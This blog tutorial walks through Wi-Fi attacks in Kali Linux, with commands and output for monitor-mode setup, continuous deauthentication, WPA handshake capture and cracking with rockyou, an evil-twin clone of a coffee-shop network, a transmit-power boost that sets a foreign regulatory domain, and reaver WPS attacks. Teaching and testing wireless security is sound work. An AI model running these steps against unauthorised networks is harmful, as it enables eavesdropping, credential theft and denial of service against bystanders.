Ethical Hacking Fridays: How to Hack (Part 13) Wireless Hacking
A lot of people have requested this article, so here goes 🙂
In order to follow this tutorial you will need the following:
- Kali Linux
- Wireless USB chipset which supports monitoring and packet injection
- If you are using Virtual Box, download and install the latest version of Virtual Box and Extension Pack. This is important, you need to make sure you are running the latest versions of both “Virtual Box” and the “Oracle VM VirtualBox Extension Pack”.
The majority of network cards don’t support “Monitor Mode” and “Packet Injection” which is essential for ethical hacking and penetration testing. The manufacturer you use is mostly irrelevant as long as they are using one of the chipsets which support the functionality we require.
Most Popular Kali Linux Pen Testing Chipsets
- Alfa AWUS036NHA
- Atheros AR9271
- Ralink RT3070
- Ralink RT3572
- Ralink RT5572
- Realtek RTL8812AU
- Ralink RT5370N
Up until now we’ve been using Kali Linux installed as a Virtual Box virtual machine. This will work with some effort but we’ll need to make some changes. Ideally using Kali on a bootable USB or a physical installation will be easier as extending the wireless USB NIC to the virtual machine isn’t straight forward. I’m going to explain how to do this anyway as this is how I’ve configured mine.
For the purpose of this tutorial I purchased two cards from Amazon to test.
I bought this USB wireless NIC on Amazon for $23.97:
And I also bought this USB wireless NIC on Amazon for $20.49Â and this is the card I would recommend:
- Alfa Network AWUS036NHA — USB WiFi Adapter, 150 Mbps, 802.11b/g/n, RP-SMA, AR9271L Atheros Chipset
They both worked but the WiFi Nation card did not fully load in the standard Kali install. It seemed to be partially detected by the kernel and wouldn’t fully go into monitor mode. I contacted their support and they asked me to download the customised version by Z Security which I did. It wasn’t ideal to have to completely re-install Kali but I can confirm their customised version does work. The Alfa card worked in the standard Kali install so if I were to pick one of the cards I would recommend that one.
Preparing Virtual Box for your new USB NIC…
- Open the Settings for our Kali Virtual Box.
- Click on Ports, then USB.
- Click on the USB icon with the green +
- Add your new USB 3.0 NIC.
- Double-click on the new NIC and change “Remote” to “Yes”
- When your Kali Virtual Box boots click on the “Devices” virtual box menu, then “USB”, then your wireless NIC. In my case “Realtek 802.11ac WAN Adapter [0200]”. If you don’t do this the USB won’t be virtually attached and Kali won’t detect it. If you don’t manage to do this while booting you can still do it later. It is like virtually plugging in a USB into your operating system, it will be detected and away you go.
Installing your USB wireless device…
- Boot and log into Kali Linux
- Open a terminal and sudo to root
kali@kali:~$ sudo su -
[sudo] password for kali:
root@kali:~#- Open, “/etc/apt/sources.list” and make sure sure the two repos are commented.
root@kali:~# vi /etc/apt/sources.listdeb http://http.kali.org/kali kali-last-snapshot main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib- Make sure your system is up to date.
root@kali:~# apt-get update -y && apt-get upgrade -y
Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 111 not upgraded.
root@kali:~#- If you are using the Realtek card, you need to install the drivers for your “Realtek RTL8811AU chipset” NIC.
root@kali:~# apt-get install realtek-rtl88xxau-dkms -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
realtek-rtl88xxau-dkms is already the newest version (5.6.4.2~git20200916-0kali1).
0 upgraded, 0 newly installed, 0 to remove and 111 not upgraded.
root@kali:~#- If you are using the Alfa card all you need to do is install the Atheros firmware. This card is by far the easier to install and works with the normal Kali install. If you are going to purchase a card for Kali this is the one I would recommend.
root@kali:~# apt-get install firmware-atheros -y- You need to fully power off your machine now, don’t save state.
root@kali:~# poweroff- If you are using the WiFi Nation card their instructions for install are a little more involved. As I mentioned this didn’t actually work for me and I eventually had to install the Z Security customised Kali build to get it working.
root@kali:~# apt install git
root@kali:~# dkms git clone https://github.com/gnab/rtl8812au.git
root@kali:~# cp -r rtl8812au /usr/src/rtl8812au-4.2.2
root@kali:~# dkms add -m rtl8812au -v 4.2.2
root@kali:~# dkms build -m rtl8812au -v 4.2.2
root@kali:~# dkms install -m rtl8812au -v 4.2.2- After reboot run check if the module is installed.
root@kali:~# modprobe 8812auThe worst part is trying to get Kali to detect the USB NIC properly which supports “Monitor Mode” and “Packet Injection” but once you get it working you should be good to go.
Is “Monitor Mode” working?
There are a few diagnostic commands you will want to run to confirm everything is working. If you don’t see your “wlan0” or equivalent interface in each command then your card has not been detected properly by Kali. One of the issues I had with the WiFi Nation card in Kali is all the commands showed the interface except for “iw”.
root@kali:~# iw dev
phy#1
Interface wlan0
ifindex 4
wdev 0x100000001
addr 22:92:14:15:1a:06
type managed
channel 1 (2412 MHz), width: 20 MHz, center1: 2412 MHz
txpower 18.00 dBmroot@kali:~# lsusb
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 001 Device 005: ID 0bda:0811 Realtek Semiconductor Corp. 802.11ac WLAN Adapter
Bus 001 Device 004: ID 80ee:0021 VirtualBox USB Tablet
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hubroot@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.2 netmask 255.255.255.0 broadcast 192.168.1.255
ether 08:00:27:61:84:e4 txqueuelen 1000 (Ethernet)
RX packets 2574 bytes 1126619 (1.0 MiB)
RX errors 0 dropped 944 overruns 0 frame 0
TX packets 728 bytes 83874 (81.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 15 bytes 729 (729.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 15 bytes 729 (729.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 2312
ether 22:92:14:15:1a:06 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0root@kali:~# ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
link/ether 08:00:27:61:84:e4 brd ff:ff:ff:ff:ff:ff
4: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP,LOWER_UP> mtu 2312 qdisc mq state DORMANT mode DORMANT group default qlen 1000
link/ether 22:92:14:15:1a:06 brd ff:ff:ff:ff:ff:ffroot@kali:~# iwconfig
lo no wireless extensions.wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.As you can see the card is currently in “managed” mode.
root@kali:~# iw dev
phy#1
Interface wlan0
ifindex 4
wdev 0x100000001
addr 92:6a:88:99:a9:fa
type managed
channel 1 (2412 MHz), width: 20 MHz, center1: 2412 MHz
txpower 18.00 dBmWe want to change this to “monitor” mode.
root@kali:~# ip link set wlan0 down
root@kali:~# iwconfig wlan0 mode monitor
root@kali:~# ip link set wlan0 up
root@kali:~# iw dev
phy#1
Interface wlan0
ifindex 4
wdev 0x100000001
addr 92:6a:88:99:a9:fa
type monitor
channel 1 (2412 MHz), width: 20 MHz, center1: 2412 MHz
txpower 18.00 dBmWhat was a little confusing is putting your wireless card into “monitor” mode may or may not create another virtual interface called “wlan0mon”. Almost all documentation I read stated this interface should be created. I did however discover that some cards (like the ones I’m using) don’t create another interface and enable monitoring on the existing “wlan0”. When you put your card into “Monitor Mode” run “ifconfig”. If you see “wlan0mon” then use that otherwise use “wlan0”.
root@kali:~# airmon-ng check killKilling these processes:PID Name
613 wpa_supplicantroot@kali:~# airmon-ng start wlan0PHY Interface Driver Chipsetphy1 wlan0 88XXau Realtek Semiconductor Corp. 802.11ac WLAN Adapter
(monitor mode enabled)Confirm that monitoring is working…
root@kali:~# airodump-ng wlan0 <-- or your wlan0monCH 10 ][ Elapsed: 6 s ][ 2020-10-25 17:03BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSIDC0:3E:0F:2A:F4:8D -1 0 3 0 1 -1 WPA <length: 0>
26:4C:E3:5C:8E:73 -22 4 0 0 1 130 WPA2 CCMP PSK <length: 21>
E8:AD:A6:E0:45:A4 -57 20 13 0 6 195 WPA2 CCMP PSK REMOVED
EA:AD:A6:E0:47:A5 -56 23 0 0 6 195 OPN REMOVED
AC:84:C6:55:95:B8 -79 10 0 0 11 270 WPA2 CCMP PSK REMOVED
58:EF:68:07:BE:07 -81 5 0 0 1 130 WPA2 CCMP PSK REMOVED
D0:57:94:B8:AC:F6 -74 5 0 0 1 130 WPA2 CCMP PSK REMOVED
AC:E2:D3:31:2A:14 -105 5 0 0 6 65 WPA2 CCMP PSK <length: 23>BSSID STATION PWR Rate Lost Frames Notes Probes(not associated) 54:E0:19:6F:17:54 -49 0 - 1 8 8
C0:3E:0F:2A:F4:8D FC:A1:83:93:55:C9 -55 0 -24e 0 10
58:EF:68:07:BE:07 24:4C:E3:5C:0E:73 -23 0 -24e 0 3
58:EF:68:07:BE:07 68:54:FD:C4:19:B5 -44 0 -24e 0 17Is “Packet Injection” working?
root@kali:~# aireplay-ng -9 wlan0
17:06:08 Trying broadcast probe requests...
17:06:10 No Answer...
17:06:10 Found 1 AP17:06:10 Trying directed probe requests...
17:06:10 AC:84:C6:55:95:B8 - channel: 11 - 'REMOVED'
17:06:11 Ping (min/avg/max): 1.489ms/5.576ms/23.743ms Power: -77.71
17:06:11 28/30: 93%17:06:11 Injection is working!Making life a little easier…
Swapping between “Monitor” mode and “Managed” mode is a bit of a pain as there are several commands to run. It would be easier to just create yourself some simple bash scripts to do them automatically.
First let’s create two empty files and give them execute permission.
root@kali:~# touch monitor.sh
root@kali:~# chmod +x monitor.shroot@kali:~# touch managed.sh
root@kali:~# chmod +x managed.shLocate where bash is located on your system.
root@kali:~# which bash
/usr/bin/bashEdit your “monitor.sh” file and add the following content.
#!/usr/bin/bashairmon-ng check kill
ip link set wlan0 down
macchanger -r wlan0
iwconfig wlan0 mode monitor
ip link set wlan0 up
iw dev | grep typeIf your bash location is different to mine in the first line then change it. I also included changing your mac address to something random. If you are pen testing a network (with permission), you may want to simulate a real attack.
Edit your “managed.sh” file and add the following content.
#!/usr/bin/bashservice NetworkManager restart
ip link set wlan0 down
iwconfig wlan0 mode managed
ip link set wlan0 up
iw dev | grep typeThis is for educational or professional purposes only! Do not attack wireless networks without permission!
Let’s take a look at the various tools and how to use them…
airodump-ng
root@kali:~# airodump-ng --helpAirodump-ng 1.6 - (C) 2006-2020 Thomas d'Otreppe
https://www.aircrack-ng.orgusage: airodump-ng <options> <interface>[,<interface>,...]Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-T : While reading packets from a file,
simulate the arrival rate of them
as if they were "live".
-x <msecs> : Active Scanning Simulation
--manufacturer : Display manufacturer from IEEE OUI list
--uptime : Display AP Uptime from Beacon Timestamp
--wps : Display WPS information (if any)
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml, logcsv
--ignore-negative-one : Removes the message that says
fixed channel <interface>: -1
--write-interval
<seconds> : Output file(s) write interval in seconds
--background <enable> : Override background detection.
-n <int> : Minimum AP packets recv'd before
for displaying itFilter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
--essid <essid> : Filter APs by ESSID
--essid-regex <regex> : Filter APs by ESSID using a regular
expression
-a : Filter unassociated clientsBy default, airodump-ng hops on 2.4GHz channels.
You can make it capture on other/specific channel(s) by using:
--ht20 : Set channel to HT20 (802.11n)
--ht40- : Set channel to HT40- (802.11n)
--ht40+ : Set channel to HT40+ (802.11n)
--channel <channels> : Capture on specific channels
--band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch--help : Displays this usage screenBasic usage performing a broad scan of the wireless networks in range.
root@kali:~# airodump-ng wlan0CH 9 ][ Elapsed: 6 s ][ 2020-10-25 18:53BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSIDC0:3E:0F:2A:F4:8D -1 0 0 0 1 -1 <length: 0>
26:4C:E3:5C:8E:73 -22 5 0 0 1 130 WPA2 CCMP PSK <length: 21>
EA:AD:A6:E0:47:A5 -58 15 0 0 6 195 OPN REMOVED
E8:AD:A6:E0:45:A4 -58 12 7 0 6 195 WPA2 CCMP PSK REMOVED
D0:57:94:B8:AC:F6 -62 6 0 0 1 130 WPA2 CCMP PSK REMOVED
AC:84:C6:55:95:B8 -77 2 0 0 11 270 WPA2 CCMP PSK REMOVED
58:EF:68:07:BE:07 -83 4 5 0 1 130 WPA2 CCMP PSK REMOVED
AC:E2:D3:31:2A:14 -103 2 0 0 6 65 WPA2 CCMP PSK <length: 23>BSSID STATION PWR Rate Lost Frames Notes ProbesC0:3E:0F:2A:F4:8D FC:A1:83:93:55:C9 -58 0 -24e 0 2
58:EF:68:07:BE:07 24:4C:E3:5C:0E:73 -3 0 -24e 46 2
58:EF:68:07:BE:07 10:AE:60:27:17:55 -20 0 - 0e 0 5
58:EF:68:07:BE:07 68:54:FD:C4:19:B5 -43 0 -24e 0 14
58:EF:68:07:BE:07 60:AB:14:25:EB:48 -77 0 - 1 6 3
58:EF:68:07:BE:07 38:71:DE:F1:B6:8C -81 0 - 1 5 2
58:EF:68:07:BE:07 40:A2:DB:0E:DF:49 -87 0 - 1 0 1- BSSID is the MAC address of the Wireless access point (AP)
- PWR is the strength of the wireless single, closer to 0 is better.
- CH is the channel the wireless access point (AP) is using
- ESSID is the name of the wireless network or SSID
- STATION is the MAC access of the wireless client connected to the AP
If we wanted to capture the wireless WEP, WPA or WPA2 key you would do this as follows.
root@kali:~# airodump-ng -c 6 -w SCAN --bssid E8:AD:A6:E0:45:A4 wlan0The command above is scanning the access point with the MAC address E8:AD:A6:E0:45:A4 on channel 6. The capture dump will be stored in files starting with SCAN.
root@kali:~# ls -la | grep SCAN
-rw-r--r-- 1 root root 139345 Oct 25 19:00 SCAN-01.cap
-rw-r--r-- 1 root root 771 Oct 25 19:00 SCAN-01.csv
-rw-r--r-- 1 root root 594 Oct 25 19:00 SCAN-01.kismet.csv
-rw-r--r-- 1 root root 5881 Oct 25 19:00 SCAN-01.kismet.netxml
-rw-r--r-- 1 root root 47062 Oct 25 19:00 SCAN-01.log.csvWhile it is scanning the top of the file will show something like this…
CH 6 ][ Elapsed: 6 s ][ 2020-10-25 18:59As soon as a wireless client authenticates you will see this. This is an indication you are ready to start cracking.
CH 6 ][ Elapsed: 3 mins ][ 2020-10-25 19:02 ][ WPA handshake: E8:AD:A6:E0:45:A4You are also able to scan a specific wireless network like this.
root@kali:~# airodump-ng --bssid E8:AD:A6:E0:45:A4 --essid WIRELESS_SSID wlan0Just replace “WIRELESS_SSID” with the actual wireless network SSID from “airodump-ng”. You could also further narrow this down to a specific channel if you prefer.
aireplay-ng
root@kali:~# aireplay-ng --helpAireplay-ng 1.6 - (C) 2006-2020 Thomas d'Otreppe
https://www.aircrack-ng.orgusage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detectionReplay options:-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n timeArp Replay attack options:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments
-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate testSource options:-i iface : capture packets from this interface
-r file : extract packets from this pcap fileMiscellaneous options:-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
--deauth-rc rc : Deauthentication reason code [0-254] (Default: 7)Attack modes (numbers can still be used):--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)--help : Displays this usage screenIn the section above, you will notice that you need to wait for a wireless client to authenticate for you to capture the WPA handshake. The way you can help this along is send a disconnect signal to all clients on the wireless network and force them to re-authenticate. The -0 argument is from the help above “deauthenticate 1 or all stations”. The number after it, “0” tells it to keep running or you could specify a specific number.
root@kali:~# aireplay-ng -0 0 -a E8:AD:A6:E0:45:A4 wlan0
17:40:25 Waiting for beacon frame (BSSID: E8:AD:A6:E0:45:A4) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
17:40:26 Sending DeAuth (code 7) to broadcast -- BSSID: [E8:AD:A6:E0:45:A4]
17:40:26 Sending DeAuth (code 7) to broadcast -- BSSID: [E8:AD:A6:E0:45:A4]
17:40:27 Sending DeAuth (code 7) to broadcast -- BSSID: [E8:AD:A6:E0:45:A4]
17:40:27 Sending DeAuth (code 7) to broadcast -- BSSID: [E8:AD:A6:E0:45:A4]
17:40:28 Sending DeAuth (code 7) to broadcast -- BSSID: [E8:AD:A6:E0:45:A4]
17:40:28 Sending DeAuth (code 7) to broadcast -- BSSID: [E8:AD:A6:E0:45:A4]This is actually a very serious denial of service attack and I’m not aware of any way to stop it. If you run the command continuously it will keep disconnecting all wireless clients effectively signal jamming the entire network. If you are aware of a way to prevent this attack please can you leave a comment as it would be good to know.
If for some reason “airplay-ng” complains that your wireless NIC is not on the same channel as the target that is easy to fix. If for example the wireless network discovered from “airodump-ng” is on channel 6 then you can run this.
root@kali:~# iwconfig wlan0 channel 6You can actually target a specific wireless client within a network like this.
root@kali:~# aireplay-ng -0 5 -a E8:AD:A6:E0:45:A4 -c TARGET_MAC wlan0Using “airodump-ng” you can see the MAC addresses of wireless clients on each network. If you replace “TARGET_MAC” with the MAC of the wireless client victim it will target them specifically. I’ve also shown you how to send 5 disconnects instead of running the command continuously.
Option “9” as in “-9” is also very useful and will carry out, “tests injection and quality”.
root@kali:~# aireplay-ng -9 wlan0
04:44:51 Trying broadcast probe requests...
04:44:51 Injection is working!
04:44:53 Found 3 APs04:44:53 Trying directed probe requests...
04:44:53 D0:57:94:B8:AC:F6 - channel: 1 - 'REMOVED'
04:44:53 Ping (min/avg/max): 1.966ms/7.358ms/29.551ms Power: -62.40
04:44:53 30/30: 100%04:44:53 62:FE:3B:CE:9E:59 - channel: 1 - 'REMOVED'
04:44:59 Ping (min/avg/max): 2.784ms/5.262ms/7.740ms Power: -95.00
04:44:59 2/30: 6%04:44:59 58:EF:68:07:BE:07 - channel: 1 - 'REMOVED'
04:45:05 0/30: 0%You are able to carry out an attack test like this.
root@kali:~# aireplay-ng -9 -i wlan1 wlan0Option “9” as in “-9” is also very useful and will carry out, “tests injection and quality”
“-i wlan1” is the interface to mimic the AP and receives packets.
“wlan0” is the injection interface.
aircrack-ng
root@kali:~# aircrack-ng --helpAircrack-ng 1.6 - (C) 2006-2020 Thomas d'Otreppe
https://www.aircrack-ng.orgusage: aircrack-ng [options] <input file(s)>Common options:-a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
-e <essid> : target selection: network identifier
-b <bssid> : target selection: access point's MAC
-p <nbcpu> : # of CPU to use (default: all CPUs)
-q : enable quiet mode (no status output)
-C <macs> : merge the given APs to a virtual one
-l <file> : write key to file. Overwrites file.Static WEP cracking options:-c : search alpha-numeric characters only
-t : search binary coded decimal chr only
-h : search the numeric key for Fritz!BOX
-d <mask> : use masking of the key (A1:XX:CF:YY)
-m <maddr> : MAC address to filter usable packets
-n <nbits> : WEP key length : 64/128/152/256/512
-i <index> : WEP key index (1 to 4), default: any
-f <fudge> : bruteforce fudge factor, default: 2
-k <korek> : disable one attack method (1 to 17)
-x or -x0 : disable bruteforce for last keybytes
-x1 : last keybyte bruteforcing (default)
-x2 : enable last 2 keybytes bruteforcing
-X : disable bruteforce multithreading
-y : experimental single bruteforce mode
-K : use only old KoreK attacks (pre-PTW)
-s : show the key in ASCII while cracking
-M <num> : specify maximum number of IVs to use
-D : WEP decloak, skips broken keystreams
-P <num> : PTW debug: 1: disable Klein, 2: PTW
-1 : run only 1 try to crack key with PTW
-V : run in visual inspection modeWEP and WPA-PSK cracking options:-w <words> : path to wordlist(s) filename(s)
-N <file> : path to new session filename
-R <file> : path to existing session filenameWPA-PSK options:-E <file> : create EWSA Project file v3
-I <str> : PMKID string (hashcat -m 16800)
-j <file> : create Hashcat v3.6+ file (HCCAPX)
-J <file> : create Hashcat file (HCCAP)
-S : WPA cracking speed test
-Z <sec> : WPA cracking speed test length of
execution.
-r <DB> : path to airolib-ng database
(Cannot be used with -w)SIMD selection:--simd-list : Show a list of the available
SIMD architectures, for this
machine.
--simd=<option> : Use specific SIMD architecture.<option> may be one of the following, depending on
your platform:generic
avx512
avx2
avx
sse2
altivec
power8
asimd
neonOther options:-u : Displays # of CPUs & SIMD support
--help : Displays this usage screen“aircrack-ng” is used to crack WEP, WPA and WPA2 wireless keys.
As I mentioned above we are looking for this result in, “airodump-ng”.
As soon as a wireless client authenticates you will see this.CH 6 ][ Elapsed: 3 mins ][ 2020-10-25 19:02 ][ WPA handshake: E8:AD:A6:E0:45:A4
It means we have successfully captured a WPA handshake between the wireless client and access point (AP).
In the “airodump-ng” section of this article I also showed you how to capture this WPA handshake in a capture file.
root@kali:~# ls -la | grep SCAN
-rw-r--r-- 1 root root 139345 Oct 25 19:00 SCAN-01.cap
-rw-r--r-- 1 root root 771 Oct 25 19:00 SCAN-01.csv
-rw-r--r-- 1 root root 594 Oct 25 19:00 SCAN-01.kismet.csv
-rw-r--r-- 1 root root 5881 Oct 25 19:00 SCAN-01.kismet.netxml
-rw-r--r-- 1 root root 47062 Oct 25 19:00 SCAN-01.log.csvYou will mainly have two ways to crack a wireless password. Either by doing a dictionary attack or by brute force. I recommend reading my other article, “Ethical Hacking (Part 4): Password & Hash Cracking” where I cover these techniques in detail.
A “dictionary attack” does not only use words from a dictionary. It will use any commonly used password or password combination. Maybe some common keyboard sequence or something common like “Password1!” will be cracked instantly. There is a very large word list called “rockyou.txt” and currently contains 14344391 passwords.
root@kali:~# apt-get install wget -yroot@kali:~# wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txtroot@kali:~# wc -l rockyou.txt
14344391 rockyou.txtYou would use this word list with “aircrack-ng” like this.
root@kali:~# aircrack-ng -w rockyou.txt SCAN_test-01.cap -e ESSID- rockyou.txt is the word list we downloaded
- SCAN_test-01.cap is the capture file created by “airodump-ng”
- –e ESSID is the wireless name / SSID of the target wireless network
While it is running it will look like this…
Aircrack-ng 1.6[00:00:10] 50654/14344391 keys tested (5021.50 k/s)Time left: 47 minutes, 26 seconds 0.35%Current passphrase: lucky!Master Key : 56 BE BE F6 9B 3B CE 8B D8 A1 A2 23 C1 CB 3D C4
30 DA A8 DB 75 40 3C B2 43 CA 58 55 6D 2E 8B 01Transient Key : D6 48 80 29 CB 04 46 AA 1E F1 22 5F 61 37 17 0A
94 96 C0 12 F1 F0 BD 3C 12 5D 15 B4 DD 65 4F DB
07 65 91 F7 DE 3E 9F 01 37 D5 ED 96 E4 B5 74 49
7A 68 46 27 CE 6F C9 F1 86 23 42 91 E2 2C CF 5EEAPOL HMAC : C3 51 8D 09 F2 2D 7E C4 70 5B 3C C9 DD B7 78 FB5021 keys per second isn’t too shabby for a virtual machine 🙂 I did however give my Kali instance two CPU’s and 8GB of memory.
The second method is doing a brute force attack. Now this will try every combination of every character which is a bit of an impossible task these days with strong passwords being used. It can however be done if you can narrow down the search by supplying the size of the passwords, or size range of a password. It can be narrowed down further if you know any of the characters in the passwords (maybe in a specific position). It can be narrowed down further if there are any characters or character sets you can exclude. For example if you know a password will be 8 characters long and be alphanumeric that will be cracked very quickly.
The tool you will want to use for this is called “crunch”. This tool is very feature rich and not possible to describe all here. The best is to open the manual for it (“man crunch”) and scroll down to the examples at the end.
The basic usage is as follows.
root@kali:~# crunch -F aircrack-ng -w - SCAN_test-01.cap -e ESSIDairbase-ng
root@kali:~# airbase-ng --helpAirbase-ng 1.6 - (C) 2008-2020 Thomas d'Otreppe
Original work: Martin Beck
https://www.aircrack-ng.orgusage: airbase-ng <options> <replay interface>Options:-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows other clients to peer)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID
-s : force shared key authentication (default: auto)
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte WEP attack (use if driver can't send frags)
-N : cfrag WEP attack (recommended)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
-n hex : User specified ANonce when doing the 4-way handshakeFilter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file--help : Displays this usage screen“airbase-ng” allows you to create or clone a wireless access point (AP). Cloning a wireless access point is how the “evil twin” attack is done.
I’ll give you an example. You are in a coffee shop and run “airodump-ng” and scan for wireless networks. You identify the wireless being provided by the coffee shop and all the devices connected.
So for interest sake let’s use the following:
- Wireless Name / SSID: CoffeeShop
- Wireless AP MAC: E8:AD:A6:B0:46:C5
- Channel: 6
root@kali:~# airbase-ng -a E8:AD:A6:B0:46:C5 --essid "CoffeeShop" -c 6 wlan0
12:45:06 Created tap interface at0
12:45:06 Trying to set MTU on at0 to 1500
12:45:06 Access Point with BSSID E8:AD:A6:B0:46:C5 started.Now we have cloned the actual access point in the coffee shop. By sending a disconnect signal to the wireless clients they will all try and re-connect.
root@kali:~# aireplay-ng -0 0 -a E8:AD:A6:E0:45:A4 wlan0As your device will be closer and have a stronger signal than the actual access point the wireless clients will all associate with your Kali instance. It is also possible to boost the signal on wireless access cards increasing the chance wireless clients connect to you.
root@kali:~# ifconfig wlan0 down
root@kali:~# iw reg set BO
root@kali:~# ifconfig wlan0 up
root@kali:~# iwconfig wlan0 channel 13
root@kali:~# iwconfig wlan0 txpower 30If we have two network interface cards in our Kali linux instance we could get the first interface to pair with the actual access point and the second interface to clone the access point which wireless clients will connect. By doing some crafty bridging, updating routing, and updating IP tables you could direct all traffic through you.
I’m not going to cover the bridging part in this article but as a hint to start you off you’ll need to install “bridge-tools”.
root@kali:~# apt-get install bridge-utils -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
bridge-utils is already the newest version (1.6-3).
0 upgraded, 0 newly installed, 0 to remove and 330 not upgraded.
You would then do something like this…
root@kali:~# brctl addbr br0root@kali:~# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.000000000000 noroot@kali:~# brctl addif br0 <interface1>
root@kali:~# brctl addif br0 <interface2>
root@kali:~# ifconfig br0 upIf you would like to try this there is a pretty good explanation in the Debian wiki.
Exploiting WPS
WPS is a bit of a crazy feature from a security perspective. I have no idea why most wireless routers are shipped with it turned on. I recommend turning this off.
root@kali:~# wash -i wlan0
BSSID Ch dBm WPS Lck Vendor ESSID
--------------------------------------------------------------------------------
D0:57:94:B8:AC:F6 1 -66 1.0 No REMOVED
26:4C:E3:5C:8E:73 1 -14 2.0 No Broadcom REMOVED
58:EF:68:07:BE:07 1 -84 2.0 No RealtekS REMOVED
40:C7:29:22:43:7E 11 -98 2.0 No Broadcom REMOVEDIf you run “wash” and you see “No” in the “Lck” column the router is vulnerable.
Let’s look at the first one using “reaver”.
root@kali:~# iwconfig wlan0 channel 6root@kali:~# reaver -b D0:57:94:B8:AC:F6 -i wlan0 -c 1 -vvReaver v1.6.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Switching wlan0 to channel 1
[+] Waiting for beacon from D0:57:94:B8:AC:F6
